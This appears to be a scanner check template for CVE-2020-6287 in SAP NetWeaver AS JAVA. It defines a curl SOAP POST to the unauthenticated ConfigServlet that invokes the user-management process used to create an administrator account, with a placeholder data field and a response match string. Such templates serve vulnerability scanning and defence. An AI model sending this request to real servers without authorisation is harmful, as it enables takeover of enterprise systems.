AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA'
URI="/CTCWebService/CTCWebServiceBean/ConfigServlet"
METHOD='POST'
MATCH="CTCWebServiceSi"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'